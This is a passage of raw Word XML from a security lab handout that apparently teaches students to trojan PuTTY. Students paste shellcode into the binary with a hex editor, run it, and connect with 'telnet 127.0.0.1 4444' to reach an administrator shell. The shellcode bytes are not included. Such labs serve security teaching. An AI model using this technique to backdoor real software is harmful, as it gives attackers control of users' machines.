        <w:t>", as shown below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D79D699" w14:textId="2D466517" w:rsidR="00243D0E" w:rsidRDefault="00711D32" w:rsidP="00243D0E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00A0E380" wp14:editId="5D64B8A8">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="2063656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67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FDCB" w14:textId="0EDCA7DE" w:rsidR="007E1A11" w:rsidRDefault="007E1A11" w:rsidP="00243D0E">
      <w:r w:rsidRPr="007E1A11">
        <w:t>The first portion of the shellcode appears in red text, as shown below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14676758" w14:textId="7E9361F5" w:rsidR="00711D32" w:rsidRDefault="006B0425" w:rsidP="00243D0E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14A5FC48" wp14:editId="7DD39517">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="674029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29389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73AC" w14:textId="77777777" w:rsidR="005A31E8" w:rsidRPr="005A31E8" w:rsidRDefault="005A31E8" w:rsidP="005A31E8">
      <w:r w:rsidRPr="005A31E8">
        <w:lastRenderedPageBreak/>
        <w:t>Above, on this Web page, highlight and copy the first set of shellcode bytes, from "29" through "d5".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A706A2" w14:textId="04BF750A" w:rsidR="006B0425" w:rsidRDefault="005A31E8" w:rsidP="005A31E8">
      <w:r w:rsidRPr="005A31E8">
        <w:t>In HxD, right-click the byte at address 000800A5 and click "</w:t>
      </w:r>
      <w:r w:rsidRPr="005A31E8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Paste write</w:t>
      </w:r>
      <w:r w:rsidRPr="005A31E8">
        <w:t>". Your screen should look like the image below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0402FD" w14:textId="63B27D63" w:rsidR="005A31E8" w:rsidRDefault="0023344E" w:rsidP="005A31E8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="518136D9" wp14:editId="584B22E8">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="10520992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9924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A678" w14:textId="26722CFE" w:rsidR="0023344E" w:rsidRDefault="00377C63" w:rsidP="005A31E8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0534DE53" wp14:editId="20F629BA">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1738617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61705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41AD" w14:textId="53AAF27D" w:rsidR="00377C63" w:rsidRDefault="00830A46" w:rsidP="005A31E8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60257C7A" wp14:editId="63DE0253">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1117765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6546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45F80" w14:textId="2615F545" w:rsidR="00830A46" w:rsidRDefault="004B1CEB" w:rsidP="005A31E8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="336F2DC9" wp14:editId="3E7AC5B6">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="25861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135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2EF6" w14:textId="1BDE6CF6" w:rsidR="004B1CEB" w:rsidRDefault="000C38A8" w:rsidP="005A31E8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C38A8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Running the Trojaned Putty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6608FAFB" w14:textId="77777777" w:rsidR="00D7028A" w:rsidRPr="00D7028A" w:rsidRDefault="00D7028A" w:rsidP="00D7028A">
      <w:r w:rsidRPr="00D7028A">
        <w:t xml:space="preserve">Double-click </w:t>
      </w:r>
      <w:r w:rsidRPr="00D7028A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>putty-newsec-YOURNAME2.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00D7028A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01915DC8" w14:textId="77777777" w:rsidR="00D7028A" w:rsidRPr="00D7028A" w:rsidRDefault="00D7028A" w:rsidP="00D7028A">
      <w:r w:rsidRPr="00D7028A">
        <w:t>Putty opens. In the "Host Name (or IP address)" box, type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C77907" w14:textId="77777777" w:rsidR="00D7028A" w:rsidRPr="00D7028A" w:rsidRDefault="00D7028A" w:rsidP="00D7028A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D7028A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ad.samsclass.info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7AE44D" w14:textId="77777777" w:rsidR="00D7028A" w:rsidRPr="00D7028A" w:rsidRDefault="00D7028A" w:rsidP="00D7028A">
      <w:r w:rsidRPr="00D7028A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">At the bottom, click the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D7028A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Open </w:t>
      </w:r>
      <w:r w:rsidRPr="00D7028A">
        <w:t>button.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68952C58" w14:textId="77777777" w:rsidR="00D7028A" w:rsidRPr="00D7028A" w:rsidRDefault="00D7028A" w:rsidP="00D7028A">
      <w:r w:rsidRPr="00D7028A">
        <w:t>A black Putty window opens, but remains blank, as shown below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F8F02E" w14:textId="3DD32C06" w:rsidR="000C38A8" w:rsidRDefault="00D7028A" w:rsidP="00D7028A">
      <w:r w:rsidRPr="00D7028A">
        <w:t xml:space="preserve">This is because we were sloppy when inserting </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D7028A">
        <w:t>shellcode, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D7028A">
        <w:t xml:space="preserve"> broke the normal operation of Putty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFD30B3" w14:textId="056A835C" w:rsidR="00D7028A" w:rsidRDefault="00C11014" w:rsidP="00D7028A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="623E1F6F" wp14:editId="5518EA74">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="119846340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63403" name="Picture 1" descr="A computer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D9B9" w14:textId="2853CC93" w:rsidR="00C11014" w:rsidRDefault="005368CF" w:rsidP="00D7028A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31DBDB86" wp14:editId="2682F2D2">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="981170368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170368" name="Picture 1" descr="A computer screen shot of a black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9664" w14:textId="396451E5" w:rsidR="005368CF" w:rsidRDefault="00A46BA9" w:rsidP="00D7028A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46BA9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Connecting to the Target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC0B519" w14:textId="77777777" w:rsidR="00A6147B" w:rsidRPr="00A6147B" w:rsidRDefault="00A6147B" w:rsidP="00A6147B">
      <w:r w:rsidRPr="00A6147B">
        <w:t>Open another Command Prompt window. Execute this command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF073C6" w14:textId="77777777" w:rsidR="00A6147B" w:rsidRPr="00A6147B" w:rsidRDefault="00A6147B" w:rsidP="00A6147B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6147B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>telnet 127.0.0.1 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9637C9" w14:textId="77777777" w:rsidR="00A6147B" w:rsidRPr="00A6147B" w:rsidRDefault="00A6147B" w:rsidP="00A6147B">
      <w:r w:rsidRPr="00A6147B">
        <w:t>A Command Prompt opens, allowing you to execute commands on the server, as shown below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E71774" w14:textId="77777777" w:rsidR="00A6147B" w:rsidRPr="00A6147B" w:rsidRDefault="00A6147B" w:rsidP="00A6147B">
      <w:r w:rsidRPr="00A6147B">
        <w:t>Execute this command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217B7351" w14:textId="77777777" w:rsidR="00A6147B" w:rsidRPr="00A6147B" w:rsidRDefault="00A6147B" w:rsidP="00A6147B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6147B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D74787" w14:textId="1803AA6B" w:rsidR="00A46BA9" w:rsidRDefault="00A6147B" w:rsidP="00A6147B">
      <w:r w:rsidRPr="00A6147B">
        <w:t>You are the local administrator, as shown below, and so is anyone else who connects to this machine on port 4444.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5874E2F0" w14:textId="50C86613" w:rsidR="00A6147B" w:rsidRDefault="00B7416A" w:rsidP="00A6147B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3300C23E" wp14:editId="58A55384">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="309128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128202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A8B58" w14:textId="0626FC8A" w:rsidR="00B7416A" w:rsidRDefault="00A6457D" w:rsidP="00A6147B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20B2FDB8" wp14:editId="283307A2">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="2143540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075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20C0" w14:textId="77777777" w:rsidR="00A6457D" w:rsidRDefault="00A6457D" w:rsidP="00A6147B"/>
    <w:p w14:paraId="75CB8983" w14:textId="77777777" w:rsidR="00DE5A3D" w:rsidRDefault="00DE5A3D" w:rsidP="00243D0E"/>
    <w:p w14:paraId="2203C1F7" w14:textId="77777777" w:rsidR="007A3509" w:rsidRDefault="007A3509" w:rsidP="00D01F78"/>
    <w:p w14:paraId="299D1FC3" w14:textId="77777777" w:rsidR="00234F6D" w:rsidRDefault="00234F6D" w:rsidP="00D01F78"/>
    <w:p w14:paraId="3C3CEFA4" w14:textId="77777777" w:rsidR="002A2DF5" w:rsidRDefault="002A2DF5" w:rsidP="00D01F78"/>
    <w:sectPr w:rsidR="002A2D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364"/>
    <w:rsid w:val="000056D9"/>
    <w:rsid w:val="00030C9E"/>
    <w:rsid w:val="00036AF2"/>
    <w:rsid w:val="0004510C"/>
    <w:rsid w:val="000634D2"/>
    <w:rsid w:val="00071CF2"/>
    <w:rsid w:val="000872D1"/>
    <w:rsid w:val="000A1B1C"/>
    <w:rsid w:val="000A4293"/>
    <w:rsid w:val="000B0BFA"/>
    <w:rsid w:val="000B7364"/>
    <w:rsid w:val="000C38A8"/>
    <w:rsid w:val="000F09D1"/>
    <w:rsid w:val="00147873"/>
    <w:rsid w:val="001802CA"/>
    <w:rsid w:val="001A0A5F"/>
    <w:rsid w:val="001F1F69"/>
    <w:rsid w:val="001F68E6"/>
    <w:rsid w:val="00202AAA"/>
    <w:rsid w:val="002119A4"/>
    <w:rsid w:val="0023344E"/>
    <w:rsid w:val="00234237"/>
    <w:rsid w:val="00234F6D"/>
    <w:rsid w:val="00243D0E"/>
    <w:rsid w:val="00254AC9"/>
    <w:rsid w:val="00262953"/>
    <w:rsid w:val="00271169"/>
    <w:rsid w:val="00294EE2"/>
    <w:rsid w:val="002A2DF5"/>
    <w:rsid w:val="002C3285"/>
    <w:rsid w:val="002F5065"/>
    <w:rsid w:val="00327149"/>
    <w:rsid w:val="00336498"/>
    <w:rsid w:val="00355136"/>
    <w:rsid w:val="00371712"/>
    <w:rsid w:val="00377C63"/>
    <w:rsid w:val="0038615C"/>
    <w:rsid w:val="00386D29"/>
    <w:rsid w:val="00397E27"/>
    <w:rsid w:val="003D5190"/>
    <w:rsid w:val="003F0482"/>
    <w:rsid w:val="004141B4"/>
    <w:rsid w:val="00414A43"/>
    <w:rsid w:val="00422DE1"/>
    <w:rsid w:val="00442493"/>
    <w:rsid w:val="004A43B8"/>
    <w:rsid w:val="004B1CEB"/>
    <w:rsid w:val="004C3A3B"/>
    <w:rsid w:val="004D4122"/>
    <w:rsid w:val="004E72A0"/>
    <w:rsid w:val="00506599"/>
    <w:rsid w:val="005368CF"/>
    <w:rsid w:val="005A31E8"/>
    <w:rsid w:val="005C3FC3"/>
    <w:rsid w:val="005D0B9D"/>
    <w:rsid w:val="00643D19"/>
    <w:rsid w:val="00655657"/>
    <w:rsid w:val="006B0425"/>
    <w:rsid w:val="006E2190"/>
    <w:rsid w:val="00711D32"/>
    <w:rsid w:val="007676FA"/>
    <w:rsid w:val="007A3509"/>
    <w:rsid w:val="007A7792"/>
    <w:rsid w:val="007B3927"/>
    <w:rsid w:val="007D59E5"/>
    <w:rsid w:val="007E1A11"/>
    <w:rsid w:val="007F588C"/>
    <w:rsid w:val="00806FD3"/>
    <w:rsid w:val="00830A46"/>
    <w:rsid w:val="00902317"/>
    <w:rsid w:val="00924091"/>
    <w:rsid w:val="009D2F38"/>
    <w:rsid w:val="00A4299D"/>
    <w:rsid w:val="00A44A1B"/>
    <w:rsid w:val="00A45D6D"/>
    <w:rsid w:val="00A46BA9"/>
    <w:rsid w:val="00A6147B"/>
    <w:rsid w:val="00A6457D"/>
    <w:rsid w:val="00AB3407"/>
    <w:rsid w:val="00AE3DCB"/>
    <w:rsid w:val="00B5285C"/>
    <w:rsid w:val="00B7416A"/>
    <w:rsid w:val="00B86DD2"/>
    <w:rsid w:val="00BA2736"/>
    <w:rsid w:val="00BB0CA3"/>
    <w:rsid w:val="00BB315F"/>
    <w:rsid w:val="00BC09CA"/>
    <w:rsid w:val="00BE381F"/>
    <w:rsid w:val="00C11014"/>
    <w:rsid w:val="00C63F5F"/>
    <w:rsid w:val="00C724BE"/>
    <w:rsid w:val="00CE1175"/>
    <w:rsid w:val="00CF4864"/>
    <w:rsid w:val="00D01F78"/>
    <w:rsid w:val="00D10C8C"/>
    <w:rsid w:val="00D16CF8"/>
    <w:rsid w:val="00D23DB4"/>
    <w:rsid w:val="00D253F5"/>
    <w:rsid w:val="00D7028A"/>
    <w:rsid w:val="00D97E6F"/>
    <w:rsid w:val="00DA6EA1"/>
    <w:rsid w:val="00DC30CE"/>
    <w:rsid w:val="00DC6895"/>
    <w:rsid w:val="00DD21C8"/>
    <w:rsid w:val="00DD4EFD"/>
    <w:rsid w:val="00DD5651"/>
    <w:rsid w:val="00DE5A3D"/>
    <w:rsid w:val="00E02C55"/>
    <w:rsid w:val="00E059CA"/>
    <w:rsid w:val="00E57966"/>
    <w:rsid w:val="00E62AF9"/>
    <w:rsid w:val="00EA6C9D"/>
    <w:rsid w:val="00EB3D47"/>
    <w:rsid w:val="00EB42CC"/>
    <w:rsid w:val="00EF4CC1"/>
    <w:rsid w:val="00F427EC"/>
    <w:rsid w:val="00FA55A7"/>
    <w:rsid w:val="00FD132E"/>
    <w:rsid w:val="00FF3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3C60"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A3A1E387-61B8-4AB7-9456-19CFD23E32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588C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="000B736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736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736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736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736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736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736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736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736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736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736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736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736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736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736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736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736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736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736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736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736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736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736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736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736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736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736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736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736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25</Pages>
  <Words>960</Words>
  <Characters>5474</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>45</Lines>
  <Paragraphs>12</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>6422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</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>quang</cp:lastModifiedBy>
  <cp:revision>223</cp:revision>
  <cp:lastPrinted>2024-10-31T12:38:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-10-31T11:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-31T12:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>